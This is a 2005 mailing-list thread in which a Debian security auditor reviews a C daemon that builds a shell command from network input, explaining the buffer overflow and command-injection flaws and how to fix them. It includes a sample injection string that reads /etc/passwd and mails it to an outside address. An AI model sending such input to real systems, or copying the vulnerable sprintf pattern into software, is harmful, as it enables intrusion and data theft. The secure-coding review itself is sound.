
Re: SOLVED: Daemon Programming



Yep, that's a good point, that I haven't realized. The security stuff is
very very important.

I have to change the code to be able to manage these problems. This is
the next step.

Thanks for your advice ;-)

Sergio Cuellar Valdes


On Fri, 14 Jan 2005 03:58:44 +0000, Steve Kemp <skx@debian.org> wrote:
> On Thu, Jan 13, 2005 at 09:41:29PM -0600, Sergio Cuéllar Valdés wrote:
> > Marc, thanks that was the problem !!!
> >
> > sprintf(message, "say -s 4 -a \"%s\"", buffer);  < this was the big
> > big big mistake
> 
>   It certainly was.
> 
> > I added the whole path to the instructions:
> >
> > sprintf(message, "/usr/local/bin/say -s 4 -a \"%s\"", buffer);
> >
> > Thanks to all of you who helped me !!  :-)
> 
>   You daemonize.  You open a socket.  You read input from that
>  socket - carefully avoiding buffer overflows - then you run the
>  command:
> 
>   /usr/local/bin/say -s 4 -a "the text you read"
> 
>   Firstly you don't avoid a simple buffer overflow.  Although
>  your two buffers, 'buffer' for receiving the message from
>  the network and 'message' for running the command, are both the
>  same size, you don't account for the extra characters when you're
>  copying:
> 
> sprintf(message, "say -s 4 -a \"%s\"", buffer);
> 
>   At least change that to:
> 
> snprintf(message, sizeof(message), "say -s 4 -a \"%s\"", buffer);
> 
>   Secondly, and this is the biggie, you don't quote or process the
>  characters which are read from the network.
> 
>   Consider what would happen if a malicious user sent this:
> 
> "; cat /etc/passwd | mail l33thack0r@hotmail.com ; echo "
> 
>   You would run this command:
> 
> /usr/local/bin/say -s 4 -a ""; cat /etc/passwd | mail ... ; echo ""
> 
>   Effectively you're allowing any user who can connect to your server
>  to execute arbitrary commands.  If this is started by init you're likely
>  running as root too.
> 
>   Check that the characters you read from the network are only
>  [a-zA-Z ] and you're probably OK.
> 
> Steve
> --
> # The Debian Security Audit Project.
> http://www.debian.org/security/audit
> 
> 


-- 
"My hope shall guide me
Through the days without you
And love shall carry me
When the pain breaks hope"


